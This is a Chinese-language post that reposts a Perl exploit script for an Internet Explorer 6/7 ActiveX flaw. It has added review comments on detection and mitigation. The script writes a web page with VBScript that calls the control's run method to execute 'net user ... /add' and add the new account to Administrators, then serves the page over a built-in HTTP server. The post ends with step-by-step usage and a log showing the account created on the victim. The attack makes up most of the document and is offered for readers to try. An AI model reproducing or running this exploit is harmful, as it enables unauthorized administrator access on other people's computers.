IE6/7远程执行代码(远程添加用户漏洞)
利用代码:
# Review note (analysis of the listing as posted; kept byte-identical, only
# these comments added). The script is shown here exactly as the page
# extraction collapsed it onto a few long lines.
#
# What the visible code does:
#   * prompts for an account name, a password and the operator's IP, then
#     appends (">>") to public_html/index.html an HTML page holding an
#     <object> with classid 72C24DD5-D70A-438B-8A42-98424B88AFB8 and a
#     VBScript block that hands the string
#     `cmd /c net user <acc> <pass> /add && net localgroup Administrators <acc> /add`
#     to that control's `run` method;
#   * then listens on the given port with a hand-rolled HTTP/1.0 server that
#     serves files from $ENV{HOME}/public_html (note: the mkdir above creates
#     public_html relative to the current directory, not under $HOME).
#
# Defender / detection view, based only on what is on this page:
#   * per the author's own instructions the page must sit in the victim's
#     Trusted Sites zone, i.e. default zone settings already block it; the
#     standard mitigation for an ActiveX control exposing a `run` method is the
#     kill bit for its CLSID plus keeping ActiveX disabled outside trusted zones;
#   * the served HTML contains the literal `net user ... /add && net localgroup
#     Administrators` text, and execution shows up as cmd.exe / net.exe spawned
#     by the browser process — both are straightforward signatures (the
#     surrounding post notes an AV product flags the saved script);
#   * the helper server appends the raw request URL to the document root and
#     opens the result with an unchecked 2-arg open on a bareword handle, and
#     calls close(FILE) even when the open failed, so it is not safe to expose.
#!/usr/bin/perl use strict; use Socket; use IO::Socket; print "\n"; print "800008 8 \n"; print "8 e eeeee eeeeeee eeeee 8 eeeee eeeee eeeee\n"; print "8eeeee 8 8 88 8 8 8 8 8 8e 8 8 8 8 8 | \n"; print " 88 8e 8 8 8e 8 8 8eee8 88 8eee8 8eee8e 8eeee \n"; print "e 88 88 8 8 88 8 8 88 8 88 88 8 88 8 88 \n"; print "8eee88 88 8eee8 88 8 8 88 8 88eee 88 8 88eee8 8ee88 \n"; print "-----------------------------------------------------------\n"; print " Useage : $0 Port \n"; print " Please Read the Instruction befor you use this \n"; print " ---------------------------------\n"; sub parse_form { my $data = $_[0]; my %data; foreach (split /&/, $data) { my ($key, $val) = split /=/; $val =~ s/\+/ /g; $val =~ s/%(..)/chr(hex($1))/eg; $data{$key} = $val;} return %data; } my $port = shift; defined($port) or die "Usage: $0 Port \n"; mkdir("public_html", 0777) || print $!; my $DOCUMENT_ROOT = $ENV{'HOME'} . "/public_html"; print " [+] Account Name : "; chomp(my $acc=<STDIN>); print " [+] Account Password : "; chomp(my $pass=<STDIN>); print " [+] Your IP : "; chomp (my $ip=<STDIN>); #------------- Exploit ----------------- my $iexplt= "public_html/index.html"; open (myfile, ">>$iexplt"); print myfile "<html>\n"; print myfile "<title> IE User Add Test </title>\n"; print myfile "<head>"; print myfile "</font></b></p>\n"; print myfile "<p>\n"; print myfile "<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='exploit'\n"; print myfile "></object>\n"; print myfile "<script language='vbscript'>\n"; print myfile "adduser="; print myfile '"cmd'; print myfile " /c net user $acc $pass /add && net localgroup Administrators $acc "; print myfile '/add"'; print myfile "\n"; print myfile "exploit.run adduser \n"; print myfile "\n </script></p>\n"; print " [+] ----------------------------------------\n"; print " [-] Link Genetrated : http://$ip:$port/index.html\n"; close (myfile); #------------------------------------ my $server = new IO::Socket::INET(Proto => 'tcp', LocalPort => $port, 
Listen => SOMAXCONN, Reuse => 1); $server or die "Unable to create server socket: $!" ; while (my $client = $server->accept()) { $client->autoflush(1); my %request = (); my %data; { local $/ = Socket::CRLF; while (<$client>) { chomp; if (/\s*(\w+)\s*([^\s]+)\s*HTTP\/(\d.\d)/) { $request{METHOD} = uc $1; $request{URL} = $2; $request{HTTP_VERSION} = $3; } elsif (/:/) { (my $type, my $val) = split /:/, $_, 2; $type =~ s/^\s+//; foreach ($type, $val) { s/^\s+//; s/\s+$//; } $request{lc $type} = $val; } elsif (/^$/) { read($client, $request{CONTENT}, $request{'content-length'}) if defined $request{'content-length'}; last; } } } if ($request{METHOD} eq 'GET') { if ($request{URL} =~ /(.*)\?(.*)/) { $request{URL} = $1; $request{CONTENT} = $2; %data = parse_form($request{CONTENT}); } else { %data = (); } $data{"_method"} = "GET"; } elsif ($request{METHOD} eq 'POST') { %data = parse_form($request{CONTENT}); $data{"_method"} = "POST"; } else { $data{"_method"} = "ERROR"; } my $localfile = $DOCUMENT_ROOT.$request{URL}; if (open(FILE, "<$localfile")) { print $client "HTTP/1.0 200 OK", Socket::CRLF; print $client "Content-type: text/html", Socket::CRLF; print $client Socket::CRLF; my $buffer; while (read(FILE, $buffer, 4096)) { print $client $buffer; } $data{"_status"} = "200"; } else { print $client "HTTP/1.0 404 Not Found", Socket::CRLF; print $client Socket::CRLF; print $client "<html><body>404 Not Found</body></html>"; $data{"_status"} = "404"; } close(FILE); print ($DOCUMENT_ROOT.$request{URL},"\n"); foreach (keys(%data)) { print (" $_ = $data{$_}\n"); } close $client; # Sioma Labs # http://siomalabs.com # Sioma Agent 154 } #Instructions #----------- # # This has been tested on windows envirnment(VisTa) . and the victom OS was windows xp sp2 ( InterNET eXplorer 7 ) # To use this on remote PC the generated link should be on victims trusted site list (tools >Internet Option> Security > Trusted Site> Sites) # No requrement to run it locally . 
just open the exploit(public_html/index.html) with the IE # Test Run ( Used OS : Vista) / ( Victim Os : XP SP2 ) # ------------------------------------------------------------- |
将上面的代码保存成ie.pl就可以了,现在我们来看一下代码中的说明部分
首先测试者用的是Vista的系统,测试对象用的是XP SP2 IE7
我们要在受害者的电脑上生成一个受信任的网站链接,这里你可以在IE-工具-Internet选项-安全-受信任站点中添加。
不用在本地运行,只要用IE打开有该漏洞代码的网页即可。
这里我再说明一下,这段代码保存后会被NOD32查杀
下面我们来看看攻击过程
# ------------------------------------------------------------- # # Attacker # ============= # # # E:\>ie.pl 123 # #800008 8 #8 e eeeee eeeeeee eeeee 8 eeeee eeeee eeeee #8eeeee 8 8 88 8 8 8 8 8 8e 8 8 8 8 8 | # 88 8e 8 8 8e 8 8 8eee8 88 8eee8 8eee8e 8eeee #e 88 88 8 8 88 8 8 88 8 88 88 8 88 8 88 #8eee88 88 8eee8 88 8 8 88 8 88eee 88 8 88eee8 8ee88 #----------------------------------------------------------- # Useage : E:\ie.pl Port # Please Read the Instruction befor you use this \n"; # --------------------------------- #[+] Account Name : test # [+] Account Password : test # [+] Your IP : 192.168.1.102 # [+] ---------------------------------------- # [-] Link Genetrated : http://192.168.1.102:123/index.html # #------------------------------------------------------------> # Not Tested on Linux ( Should Work on it too) # # # Victim #======== # Befor - # C:\>net user # #User accounts for \\PC-00583E3C730C # #------------------------------------------------------------------------------- #Administrator SiomaPC Guest #HelpAssistant SUPPORT_388945a0 #The command completed successfully. # # After - #C:\>net user # #User accounts for \\PC-00583E3C730C # #------------------------------------------------------------------------------- #Administrator SiomaPC Guest #HelpAssistant SUPPORT_388945a0 test #The command completed successfully. # #C:\> # ============================================================================ # The "test" user has been created successfully # # Delete The "Public_Html\index.html" If you use this for the 2nd time |
这就是整个具体的攻击过程有兴趣的朋友可以试下:)